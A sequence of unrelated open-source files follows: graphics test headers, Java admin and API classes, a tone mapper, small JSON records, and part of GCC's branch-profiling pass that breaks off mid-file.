#ifndef _ES2PTEXTURECASES_HPP
#define _ES2PTEXTURECASES_HPP
/*-------------------------------------------------------------------------
 * drawElements Quality Program OpenGL ES 2.0 Module
 * -------------------------------------------------
 *
 * Copyright 2014 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 *
 *//*!
 * \file
 * \brief Texture format performance tests.
 *//*--------------------------------------------------------------------*/

#include "tcuDefs.hpp"
#include "tes2TestCase.hpp"
#include "glsShaderPerformanceCase.hpp"
#include "tcuMatrix.hpp"
#include "gluTexture.hpp"

namespace deqp
{
namespace gles2
{
namespace Performance
{

class Texture2DRenderCase : public gls::ShaderPerformanceCase
{
public:
                Texture2DRenderCase     (Context& context,
                                         const char* name,
                                         const char* description,
                                         deUint32 format,
                                         deUint32 dataType,
                                         deUint32 wrapS,
                                         deUint32 wrapT,
                                         deUint32 minFilter,
                                         deUint32 magFilter,
                                         const tcu::Mat3& coordTransform,
                                         int numTextures,
                                         bool powerOfTwo);
                ~Texture2DRenderCase    (void);

    void        init                    (void);
    void        deinit                  (void);

private:
    void        setupProgram            (deUint32 program);
    void        setupRenderState        (void);

    deUint32                        m_format;
    deUint32                        m_dataType;
    deUint32                        m_wrapS;
    deUint32                        m_wrapT;
    deUint32                        m_minFilter;
    deUint32                        m_magFilter;
    tcu::Mat3                       m_coordTransform;
    int                             m_numTextures;
    bool                            m_powerOfTwo;
    std::vector<glu::Texture2D*>    m_textures;
};

} // Performance
} // gles2
} // deqp

#endif // _ES2PTEXTURECASES_HPP
/**
 * Copyright Pravega Authors.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package io.pravega.cli.admin.segmentstore;

import io.pravega.cli.admin.CommandArgs;
import io.pravega.cli.admin.utils.AdminSegmentHelper;
import io.pravega.shared.protocol.netty.PravegaNodeUri;
import io.pravega.shared.protocol.netty.WireCommands;
import lombok.Cleanup;
import org.apache.curator.framework.CuratorFramework;

import java.util.concurrent.CompletableFuture;
import java.util.concurrent.TimeUnit;

import static java.lang.Integer.parseInt;

/**
 * Executes a FlushToStorage request against the chosen Segment Store instance.
 */
public class FlushToStorageCommand extends ContainerCommand {

    private static final int REQUEST_TIMEOUT_SECONDS = 30;
    private static final String ALL_CONTAINERS = "all";

    /**
     * Creates new instance of the FlushToStorageCommand.
     *
     * @param args The arguments for the command.
     */
    public FlushToStorageCommand(CommandArgs args) {
        super(args);
    }

    @Override
    public void execute() throws Exception {
        ensureArgCount(2);
        final String containerId = getArg(0);
        final String segmentStoreHost = getArg(1);
        @Cleanup
        CuratorFramework zkClient = createZKClient();
        @Cleanup
        AdminSegmentHelper adminSegmentHelper = instantiateAdminSegmentHelper(zkClient);
        if (containerId.equalsIgnoreCase(ALL_CONTAINERS)) {
            int containerCount = getServiceConfig().getContainerCount();
            for (int id = 0; id < containerCount; id++) {
                flushContainerToStorage(adminSegmentHelper, id, segmentStoreHost);
            }
        } else {
            flushContainerToStorage(adminSegmentHelper, parseInt(containerId), segmentStoreHost);
        }
    }

    private void flushContainerToStorage(AdminSegmentHelper adminSegmentHelper, int containerId, String segmentStoreHost) throws Exception {
        CompletableFuture<WireCommands.StorageFlushed> reply = adminSegmentHelper.flushToStorage(containerId,
                new PravegaNodeUri(segmentStoreHost, getServiceConfig().getAdminGatewayPort()), super.authHelper.retrieveMasterToken());
        reply.get(REQUEST_TIMEOUT_SECONDS, TimeUnit.SECONDS);
        output("Flushed the Segment Container with containerId %d to Storage.", containerId);
    }

    public static CommandDescriptor descriptor() {
        return new CommandDescriptor(COMPONENT, "flush-to-storage", "Persist the given Segment Container into Storage.",
                new ArgDescriptor("container-id", "The container Id of the Segment Container that needs to be persisted, " +
                        "if given as \"all\" all the containers will be persisted."),
                new ArgDescriptor("segmentstore-endpoint", "Address of the Segment Store we want to send this request."));
    }
}
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------


def backup_exception_handler(ex):
    from azure.core.exceptions import HttpResponseError
    if isinstance(ex, HttpResponseError) and ex.message:
        raise HttpResponseError(ex.message)
    raise ex
{ "word": "Bothersome", "definitions": [ "Annoying; troublesome." ], "parts-of-speech": "Adjective" }
package com.mossle.disk.persistence.manager;

import com.mossle.core.hibernate.HibernateEntityDao;
import com.mossle.disk.persistence.domain.DiskVersion;

import org.springframework.stereotype.Service;

@Service
public class DiskVersionManager extends HibernateEntityDao<DiskVersion> {
}
#include <agz/tracer/core/post_processor.h>
#include <agz/tracer/utility/logger.h>
#include <agz-utils/misc.h>

AGZ_TRACER_BEGIN

class ACESToneMapper : public PostProcessor
{
    static real aces_curve(real x) noexcept
    {
        constexpr real tA = real(2.51);
        constexpr real tB = real(0.03);
        constexpr real tC = real(2.43);
        constexpr real tD = real(0.59);
        constexpr real tE = real(0.14);
        return math::clamp(
            (x * (tA * x + tB)) / (x * (tC * x + tD) + tE),
            real(0), real(1));
    }

    static Spectrum avg_lum(const Image2D<Spectrum> &img)
    {
        Spectrum sum;
        for(int y = 0; y < img.height(); ++y)
        {
            for(int x = 0; x < img.width(); ++x)
            {
                sum.r += std::log(real(0.01) + math::clamp<real>(img(y, x).r, 0, 4));
                sum.g += std::log(real(0.01) + math::clamp<real>(img(y, x).g, 0, 4));
                sum.b += std::log(real(0.01) + math::clamp<real>(img(y, x).b, 0, 4));
            }
        }
        return sum.map([&](real x)
        {
            return std::exp(x / (img.width() * img.height()));
        });
    }

    real exposure_ = 10;

public:

    explicit ACESToneMapper(real exposure)
    {
        AGZ_HIERARCHY_TRY

        exposure_ = exposure;
        if(exposure_ < 0)
            throw ObjectConstructionException("invalid exposure value");

        AGZ_HIERARCHY_WRAP("in initializing ACES tone mapper")
    }

    void process(RenderTarget &render_target) override
    {
        AGZ_INFO("aces tone mapping");

        auto &image = render_target.image;
        for(int y = 0; y < image.height(); ++y)
        {
            for(int x = 0; x < image.width(); ++x)
            {
                auto &pixel = image(y, x);
                pixel.r = aces_curve(pixel.r * exposure_);
                pixel.g = aces_curve(pixel.g * exposure_);
                pixel.b = aces_curve(pixel.b * exposure_);
            }
        }
    }
};

RC<PostProcessor> create_aces_tone_mapper(real exposure)
{
    return newRC<ACESToneMapper>(exposure);
}

AGZ_TRACER_END
{"nom":"Maurrin","circ":"3ème circonscription","dpt":"Landes","inscrits":349,"abs":137,"votants":212,"blancs":2,"nuls":18,"exp":192,"res":[{"nuance":"SOC","nom":"<NAME>","voix":99},{"nuance":"REM","nom":"<NAME>","voix":93}]}
#include "../common.h" #include "AppQuitRequestedTester.h" #include "AppQuitTester.h" #include "AppRunTester.h" #include "BApplicationTester.h" CppUnit::Test* ApplicationTestSuite() { CppUnit::TestSuite *testSuite = new CppUnit::TestSuite(); testSuite->addTest(AppQuitRequestedTester::Suite()); testSuite->addTest(AppQuitTester::Suite()); testSuite->addTest(AppRunTester::Suite()); testSuite->addTest(TBApplicationTester::Suite()); return testSuite; }
package com.foxinmy.weixin4j.wxa;

import java.util.Properties;

import com.foxinmy.weixin4j.cache.CacheStorager;
import com.foxinmy.weixin4j.cache.FileCacheStorager;
import com.foxinmy.weixin4j.model.Token;
import com.foxinmy.weixin4j.model.WeixinAccount;
import com.foxinmy.weixin4j.mp.token.WeixinTokenCreator;
import com.foxinmy.weixin4j.token.TokenCreator;
import com.foxinmy.weixin4j.token.TokenManager;
import com.foxinmy.weixin4j.wxa.api.CustomMessageApi;
import com.foxinmy.weixin4j.wxa.api.LoginApi;
import com.foxinmy.weixin4j.wxa.api.QrCodeApi;
import com.foxinmy.weixin4j.wxa.api.SecCheckApi;
import com.foxinmy.weixin4j.wxa.api.TemplateApi;
import com.foxinmy.weixin4j.wxa.api.TemplateMessageApi;
import com.foxinmy.weixin4j.wxa.api.SubscribeMessageApi;

/**
 * The facade of WeChat Mini Program APIs.
 *
 * @since 1.8
 */
public class WeixinAppFacade {

	private final LoginApi loginApi;
	private final QrCodeApi qrCodeApi;
	private final TemplateApi templateApi;
	private final TemplateMessageApi templateMessageApi;
	private final CustomMessageApi customMessageApi;
	private final SecCheckApi secCheckApi;
	private final SubscribeMessageApi subscribeMessageApi;

	/**
	 * Constructs {@link WeixinAppFacade} using {@link FileCacheStorager}.
	 *
	 * @param weixinAccount the {@link WeixinAccount}.
	 */
	public WeixinAppFacade(WeixinAccount weixinAccount) {
		this(weixinAccount, new FileCacheStorager<Token>());
	}

	/**
	 * Constructs {@link WeixinAppFacade} using the specified {@link CacheStorager}.
	 *
	 * @param weixinAccount the {@link WeixinAccount}.
	 * @param cacheStorager the {@link CacheStorager}.
	 */
	public WeixinAppFacade(WeixinAccount weixinAccount, CacheStorager<Token> cacheStorager) {
		this(weixinAccount, cacheStorager, null);
	}

	/**
	 * Constructs {@link WeixinAppFacade} using the specified {@link CacheStorager},
	 * and overrides properties defined in {@code weixin.properties}.
	 *
	 * @param weixinAccount the {@link WeixinAccount}.
	 * @param cacheStorager the {@link CacheStorager}.
	 * @param properties    properties to override the properties defined in {@code weixin.properties}.
	 */
	public WeixinAppFacade(
			WeixinAccount weixinAccount,
			CacheStorager<Token> cacheStorager,
			Properties properties) {
		this(
				weixinAccount,
				new WeixinTokenCreator(weixinAccount.getId(), weixinAccount.getSecret()),
				cacheStorager,
				properties);
	}

	private WeixinAppFacade(
			WeixinAccount weixinAccount,
			TokenCreator tokenCreator,
			CacheStorager<Token> cacheStorager,
			Properties properties) {
		if (weixinAccount == null) {
			throw new IllegalArgumentException("weixinAccount must not be empty");
		}
		if (tokenCreator == null) {
			throw new IllegalArgumentException("tokenCreator must not be empty");
		}
		if (cacheStorager == null) {
			throw new IllegalArgumentException("cacheStorager must not be empty");
		}

		final TokenManager tokenManager = new TokenManager(tokenCreator, cacheStorager);
		this.loginApi = new LoginApi(weixinAccount, properties);
		this.qrCodeApi = new QrCodeApi(tokenManager, properties);
		this.templateApi = new TemplateApi(tokenManager, properties);
		this.templateMessageApi = new TemplateMessageApi(tokenManager, properties);
		this.customMessageApi = new CustomMessageApi(tokenManager, properties);
		this.secCheckApi = new SecCheckApi(tokenManager, properties);
		this.subscribeMessageApi = new SubscribeMessageApi(tokenManager, properties);
	}

	/**
	 * Gets the login-related APIs.
	 *
	 * @return the login APIs.
	 */
	public LoginApi getLoginApi() {
		return loginApi;
	}

	/**
	 * Gets the APIs for Mini Program codes and Mini Program QR codes.
	 *
	 * @return the Mini Program code and QR code APIs.
	 */
	public QrCodeApi getQrCodeApi() {
		return qrCodeApi;
	}

	/**
	 * Gets the template management APIs.
	 *
	 * @return the template management APIs.
	 */
	public TemplateApi getTemplateApi() {
		return templateApi;
	}

	/**
	 * Gets the template message APIs.
	 *
	 * @return the template message APIs.
	 */
	public TemplateMessageApi getTemplateMessageApi() {
		return templateMessageApi;
	}

	/**
	 * Gets the subscribe message APIs.
	 *
	 * @return the subscribe message APIs.
	 */
	public SubscribeMessageApi getSubscribeMessageApi() {
		return subscribeMessageApi;
	}

	/**
	 * Gets the customer service message APIs.
	 *
	 * @return the customer service message APIs.
	 */
	public CustomMessageApi getCustomMessageApi() {
		return customMessageApi;
	}

	/**
	 * Gets the content security APIs.
	 *
	 * @return the content security APIs.
	 * @since 1.9
	 */
	public SecCheckApi getSecCheckApi() {
		return secCheckApi;
	}
}
<gh_stars>100-1000 /************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #ifndef _COMPHELPER_STREAM_SEEKABLEINPUT_HXX_ #define _COMPHELPER_STREAM_SEEKABLEINPUT_HXX_ #include <osl/mutex.hxx> #include <com/sun/star/uno/Reference.hxx> #include <com/sun/star/lang/XMultiServiceFactory.hpp> #include <com/sun/star/io/XInputStream.hpp> #include <com/sun/star/io/XSeekable.hpp> #include <cppuhelper/implbase2.hxx> #include "comphelper/comphelperdllapi.h" namespace comphelper { class COMPHELPER_DLLPUBLIC OSeekableInputWrapper : public ::cppu::WeakImplHelper2< ::com::sun::star::io::XInputStream, ::com::sun::star::io::XSeekable > { ::osl::Mutex m_aMutex; ::com::sun::star::uno::Reference< ::com::sun::star::lang::XMultiServiceFactory > m_xFactory; ::com::sun::star::uno::Reference< ::com::sun::star::io::XInputStream > m_xOriginalStream; ::com::sun::star::uno::Reference< ::com::sun::star::io::XInputStream > m_xCopyInput; ::com::sun::star::uno::Reference< ::com::sun::star::io::XSeekable > m_xCopySeek; private: COMPHELPER_DLLPRIVATE void PrepareCopy_Impl(); public: OSeekableInputWrapper( const ::com::sun::star::uno::Reference< ::com::sun::star::io::XInputStream >& xInStream, const ::com::sun::star::uno::Reference< ::com::sun::star::lang::XMultiServiceFactory >& xFactory ); virtual ~OSeekableInputWrapper(); static ::com::sun::star::uno::Reference< ::com::sun::star::io::XInputStream > CheckSeekableCanWrap( const ::com::sun::star::uno::Reference< ::com::sun::star::io::XInputStream >& xInStream, const ::com::sun::star::uno::Reference< ::com::sun::star::lang::XMultiServiceFactory >& xFactory ); // XInputStream virtual sal_Int32 SAL_CALL readBytes( ::com::sun::star::uno::Sequence< sal_Int8 >& aData, sal_Int32 nBytesToRead ) throw (::com::sun::star::io::NotConnectedException, ::com::sun::star::io::BufferSizeExceededException, ::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); virtual sal_Int32 SAL_CALL readSomeBytes( ::com::sun::star::uno::Sequence< sal_Int8 >& aData, sal_Int32 nMaxBytesToRead ) throw (::com::sun::star::io::NotConnectedException, ::com::sun::star::io::BufferSizeExceededException, ::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); virtual void SAL_CALL skipBytes( sal_Int32 nBytesToSkip ) throw (::com::sun::star::io::NotConnectedException, ::com::sun::star::io::BufferSizeExceededException, ::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); virtual sal_Int32 SAL_CALL available() throw (::com::sun::star::io::NotConnectedException, ::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); virtual void SAL_CALL closeInput() throw 
(::com::sun::star::io::NotConnectedException, ::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); // XSeekable virtual void SAL_CALL seek( sal_Int64 location ) throw (::com::sun::star::lang::IllegalArgumentException, ::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); virtual sal_Int64 SAL_CALL getPosition() throw (::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); virtual sal_Int64 SAL_CALL getLength() throw (::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); }; } // namespace comphelper #endif
/**
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.apache.metron.rest.model.pcap;

import org.apache.commons.collections4.map.AbstractMapDecorator;
import org.apache.metron.pcap.config.PcapOptions;

import java.util.HashMap;

public abstract class PcapRequest extends AbstractMapDecorator<String, Object> {

  public PcapRequest() {
    super(new HashMap<>());
    setStartTimeMs(0L);
    setEndTimeMs(System.currentTimeMillis());
    setNumReducers(10);
  }

  public String getBasePath() {
    return PcapOptions.BASE_PATH.get(this, String.class);
  }

  public void setBasePath(String basePath) {
    PcapOptions.BASE_PATH.put(this, basePath);
  }

  public String getBaseInterimResultPath() {
    return PcapOptions.BASE_INTERIM_RESULT_PATH.get(this, String.class);
  }

  public void setBaseInterimResultPath(String baseInterimResultPath) {
    PcapOptions.BASE_INTERIM_RESULT_PATH.put(this, baseInterimResultPath);
  }

  public String getFinalOutputPath() {
    return PcapOptions.FINAL_OUTPUT_PATH.get(this, String.class);
  }

  public void setFinalOutputPath(String finalOutputPath) {
    PcapOptions.FINAL_OUTPUT_PATH.put(this, finalOutputPath);
  }

  public Long getStartTimeMs() {
    return PcapOptions.START_TIME_MS.get(this, Long.class);
  }

  public void setStartTimeMs(Long startTime) {
    PcapOptions.START_TIME_MS.put(this, startTime);
  }

  public Long getEndTimeMs() {
    return PcapOptions.END_TIME_MS.get(this, Long.class);
  }

  public void setEndTimeMs(Long endTime) {
    PcapOptions.END_TIME_MS.put(this, endTime);
  }

  public Integer getNumReducers() {
    return PcapOptions.NUM_REDUCERS.get(this, Integer.class);
  }

  public void setNumReducers(Integer numReducers) {
    PcapOptions.NUM_REDUCERS.put(this, numReducers);
  }

  public abstract void setFields();
}
<gh_stars>100-1000 /* Calculate branch probabilities, and basic block execution counts. Copyright (C) 1990, 1991, 1992, 1993, 1994, 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2007, 2008, 2009, 2010, 2011, 2012 Free Software Foundation, Inc. Contributed by <NAME>, UC Berkeley/Cygnus Support; based on some ideas from Dain Samples of UC Berkeley. Further mangling by <NAME>, Cygnus Support. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3, or (at your option) any later version. GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING3. If not see <http://www.gnu.org/licenses/>. */ /* Generate basic block profile instrumentation and auxiliary files. Profile generation is optimized, so that not all arcs in the basic block graph need instrumenting. First, the BB graph is closed with one entry (function start), and one exit (function exit). Any ABNORMAL_EDGE cannot be instrumented (because there is no control path to place the code). We close the graph by inserting fake EDGE_FAKE edges to the EXIT_BLOCK, from the sources of abnormal edges that do not go to the exit_block. We ignore such abnormal edges. Naturally these fake edges are never directly traversed, and so *cannot* be directly instrumented. Some other graph massaging is done. To optimize the instrumentation we generate the BB minimal span tree, only edges that are not on the span tree (plus the entry point) need instrumenting. From that information all other edge counts can be deduced. By construction all fake edges must be on the spanning tree. We also attempt to place EDGE_CRITICAL edges on the spanning tree. The auxiliary files generated are <dumpbase>.gcno (at compile time) and <dumpbase>.gcda (at run time). The format is described in full in gcov-io.h. */ /* ??? Register allocation should use basic block execution counts to give preference to the most commonly executed blocks. */ /* ??? Should calculate branch probabilities before instrumenting code, since then we can use arc counts to help decide which arcs to instrument. */ #include "config.h" #include "system.h" #include "coretypes.h" #include "tm.h" #include "rtl.h" #include "flags.h" #include "output.h" #include "regs.h" #include "expr.h" #include "function.h" #include "basic-block.h" #include "diagnostic-core.h" #include "coverage.h" #include "value-prof.h" #include "tree.h" #include "cfghooks.h" #include "tree-flow.h" #include "timevar.h" #include "cfgloop.h" #include "tree-pass.h" #include "profile.h" struct bb_info { unsigned int count_valid : 1; /* Number of successor and predecessor edges. */ gcov_type succ_count; gcov_type pred_count; }; #define BB_INFO(b) ((struct bb_info *) (b)->aux) /* Counter summary from the last set of coverage counts read. */ const struct gcov_ctr_summary *profile_info; /* Collect statistics on the performance of this pass for the entire source file. 
*/ static int total_num_blocks; static int total_num_edges; static int total_num_edges_ignored; static int total_num_edges_instrumented; static int total_num_blocks_created; static int total_num_passes; static int total_num_times_called; static int total_hist_br_prob[20]; static int total_num_branches; /* Forward declarations. */ static void find_spanning_tree (struct edge_list *); /* Add edge instrumentation code to the entire insn chain. F is the first insn of the chain. NUM_BLOCKS is the number of basic blocks found in F. */ static unsigned instrument_edges (struct edge_list *el) { unsigned num_instr_edges = 0; int num_edges = NUM_EDGES (el); basic_block bb; FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { edge e; edge_iterator ei; FOR_EACH_EDGE (e, ei, bb->succs) { struct edge_info *inf = EDGE_INFO (e); if (!inf->ignore && !inf->on_tree) { gcc_assert (!(e->flags & EDGE_ABNORMAL)); if (dump_file) fprintf (dump_file, "Edge %d to %d instrumented%s\n", e->src->index, e->dest->index, EDGE_CRITICAL_P (e) ? " (and split)" : ""); gimple_gen_edge_profiler (num_instr_edges++, e); } } } total_num_blocks_created += num_edges; if (dump_file) fprintf (dump_file, "%d edges instrumented\n", num_instr_edges); return num_instr_edges; } /* Add code to measure histograms for values in list VALUES. */ static void instrument_values (histogram_values values) { unsigned i, t; /* Emit code to generate the histograms before the insns. */ for (i = 0; i < VEC_length (histogram_value, values); i++) { histogram_value hist = VEC_index (histogram_value, values, i); switch (hist->type) { case HIST_TYPE_INTERVAL: t = GCOV_COUNTER_V_INTERVAL; break; case HIST_TYPE_POW2: t = GCOV_COUNTER_V_POW2; break; case HIST_TYPE_SINGLE_VALUE: t = GCOV_COUNTER_V_SINGLE; break; case HIST_TYPE_CONST_DELTA: t = GCOV_COUNTER_V_DELTA; break; case HIST_TYPE_INDIR_CALL: t = GCOV_COUNTER_V_INDIR; break; case HIST_TYPE_AVERAGE: t = GCOV_COUNTER_AVERAGE; break; case HIST_TYPE_IOR: t = GCOV_COUNTER_IOR; break; default: gcc_unreachable (); } if (!coverage_counter_alloc (t, hist->n_counters)) continue; switch (hist->type) { case HIST_TYPE_INTERVAL: gimple_gen_interval_profiler (hist, t, 0); break; case HIST_TYPE_POW2: gimple_gen_pow2_profiler (hist, t, 0); break; case HIST_TYPE_SINGLE_VALUE: gimple_gen_one_value_profiler (hist, t, 0); break; case HIST_TYPE_CONST_DELTA: gimple_gen_const_delta_profiler (hist, t, 0); break; case HIST_TYPE_INDIR_CALL: gimple_gen_ic_profiler (hist, t, 0); break; case HIST_TYPE_AVERAGE: gimple_gen_average_profiler (hist, t, 0); break; case HIST_TYPE_IOR: gimple_gen_ior_profiler (hist, t, 0); break; default: gcc_unreachable (); } } } /* Computes hybrid profile for all matching entries in da_file. CFG_CHECKSUM is the precomputed checksum for the CFG. */ static gcov_type * get_exec_counts (unsigned cfg_checksum, unsigned lineno_checksum) { unsigned num_edges = 0; basic_block bb; gcov_type *counts; /* Count the edges to be (possibly) instrumented. 
*/ FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { edge e; edge_iterator ei; FOR_EACH_EDGE (e, ei, bb->succs) if (!EDGE_INFO (e)->ignore && !EDGE_INFO (e)->on_tree) num_edges++; } counts = get_coverage_counts (GCOV_COUNTER_ARCS, num_edges, cfg_checksum, lineno_checksum, &profile_info); if (!counts) return NULL; if (dump_file && profile_info) fprintf(dump_file, "Merged %u profiles with maximal count %u.\n", profile_info->runs, (unsigned) profile_info->sum_max); return counts; } static bool is_edge_inconsistent (VEC(edge,gc) *edges) { edge e; edge_iterator ei; FOR_EACH_EDGE (e, ei, edges) { if (!EDGE_INFO (e)->ignore) { if (e->count < 0 && (!(e->flags & EDGE_FAKE) || !block_ends_with_call_p (e->src))) { if (dump_file) { fprintf (dump_file, "Edge %i->%i is inconsistent, count"HOST_WIDEST_INT_PRINT_DEC, e->src->index, e->dest->index, e->count); dump_bb (e->src, dump_file, 0); dump_bb (e->dest, dump_file, 0); } return true; } } } return false; } static void correct_negative_edge_counts (void) { basic_block bb; edge e; edge_iterator ei; FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { FOR_EACH_EDGE (e, ei, bb->succs) { if (e->count < 0) e->count = 0; } } } /* Check consistency. Return true if inconsistency is found. */ static bool is_inconsistent (void) { basic_block bb; bool inconsistent = false; FOR_EACH_BB (bb) { inconsistent |= is_edge_inconsistent (bb->preds); if (!dump_file && inconsistent) return true; inconsistent |= is_edge_inconsistent (bb->succs); if (!dump_file && inconsistent) return true; if (bb->count < 0) { if (dump_file) { fprintf (dump_file, "BB %i count is negative " HOST_WIDEST_INT_PRINT_DEC, bb->index, bb->count); dump_bb (bb, dump_file, 0); } inconsistent = true; } if (bb->count != sum_edge_counts (bb->preds)) { if (dump_file) { fprintf (dump_file, "BB %i count does not match sum of incoming edges " HOST_WIDEST_INT_PRINT_DEC" should be " HOST_WIDEST_INT_PRINT_DEC, bb->index, bb->count, sum_edge_counts (bb->preds)); dump_bb (bb, dump_file, 0); } inconsistent = true; } if (bb->count != sum_edge_counts (bb->succs) && ! (find_edge (bb, EXIT_BLOCK_PTR) != NULL && block_ends_with_call_p (bb))) { if (dump_file) { fprintf (dump_file, "BB %i count does not match sum of outgoing edges " HOST_WIDEST_INT_PRINT_DEC" should be " HOST_WIDEST_INT_PRINT_DEC, bb->index, bb->count, sum_edge_counts (bb->succs)); dump_bb (bb, dump_file, 0); } inconsistent = true; } if (!dump_file && inconsistent) return true; } return inconsistent; } /* Set each basic block count to the sum of its outgoing edge counts */ static void set_bb_counts (void) { basic_block bb; FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { bb->count = sum_edge_counts (bb->succs); gcc_assert (bb->count >= 0); } } /* Reads profile data and returns total number of edge counts read */ static int read_profile_edge_counts (gcov_type *exec_counts) { basic_block bb; int num_edges = 0; int exec_counts_pos = 0; /* For each edge not on the spanning tree, set its execution count from the .da file. */ /* The first count in the .da file is the number of times that the function was entered. This is the exec_count for block zero. 
*/ FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { edge e; edge_iterator ei; FOR_EACH_EDGE (e, ei, bb->succs) if (!EDGE_INFO (e)->ignore && !EDGE_INFO (e)->on_tree) { num_edges++; if (exec_counts) { e->count = exec_counts[exec_counts_pos++]; if (e->count > profile_info->sum_max) { if (flag_profile_correction) { static bool informed = 0; if (!informed) inform (input_location, "corrupted profile info: edge count exceeds maximal count"); informed = 1; } else error ("corrupted profile info: edge from %i to %i exceeds maximal count", bb->index, e->dest->index); } } else e->count = 0; EDGE_INFO (e)->count_valid = 1; BB_INFO (bb)->succ_count--; BB_INFO (e->dest)->pred_count--; if (dump_file) { fprintf (dump_file, "\nRead edge from %i to %i, count:", bb->index, e->dest->index); fprintf (dump_file, HOST_WIDEST_INT_PRINT_DEC, (HOST_WIDEST_INT) e->count); } } } return num_edges; } #define OVERLAP_BASE 10000 /* Compare the static estimated profile to the actual profile, and return the "degree of overlap" measure between them. Degree of overlap is a number between 0 and OVERLAP_BASE. It is the sum of each basic block's minimum relative weights between two profiles. And overlap of OVERLAP_BASE means two profiles are identical. */ static int compute_frequency_overlap (void) { gcov_type count_total = 0, freq_total = 0; int overlap = 0; basic_block bb; FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { count_total += bb->count; freq_total += bb->frequency; } if (count_total == 0 || freq_total == 0) return 0; FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) overlap += MIN (bb->count * OVERLAP_BASE / count_total, bb->frequency * OVERLAP_BASE / freq_total); return overlap; } /* Compute the branch probabilities for the various branches. Annotate them accordingly. CFG_CHECKSUM is the precomputed checksum for the CFG. */ static void compute_branch_probabilities (unsigned cfg_checksum, unsigned lineno_checksum) { basic_block bb; int i; int num_edges = 0; int changes; int passes; int hist_br_prob[20]; int num_branches; gcov_type *exec_counts = get_exec_counts (cfg_checksum, lineno_checksum); int inconsistent = 0; /* Very simple sanity checks so we catch bugs in our profiling code. */ if (!profile_info) return; if (profile_info->run_max * profile_info->runs < profile_info->sum_max) { error ("corrupted profile info: run_max * runs < sum_max"); exec_counts = NULL; } if (profile_info->sum_all < profile_info->sum_max) { error ("corrupted profile info: sum_all is smaller than sum_max"); exec_counts = NULL; } /* Attach extra info block to each bb. */ alloc_aux_for_blocks (sizeof (struct bb_info)); FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { edge e; edge_iterator ei; FOR_EACH_EDGE (e, ei, bb->succs) if (!EDGE_INFO (e)->ignore) BB_INFO (bb)->succ_count++; FOR_EACH_EDGE (e, ei, bb->preds) if (!EDGE_INFO (e)->ignore) BB_INFO (bb)->pred_count++; } /* Avoid predicting entry on exit nodes. */ BB_INFO (EXIT_BLOCK_PTR)->succ_count = 2; BB_INFO (ENTRY_BLOCK_PTR)->pred_count = 2; num_edges = read_profile_edge_counts (exec_counts); if (dump_file) fprintf (dump_file, "\n%d edge counts read\n", num_edges); /* For every block in the file, - if every exit/entrance edge has a known count, then set the block count - if the block count is known, and every exit/entrance edge but one has a known execution count, then set the count of the remaining edge As edge counts are set, decrement the succ/pred count, but don't delete the edge, that way we can easily tell when all edges are known, or only one edge is unknown. 
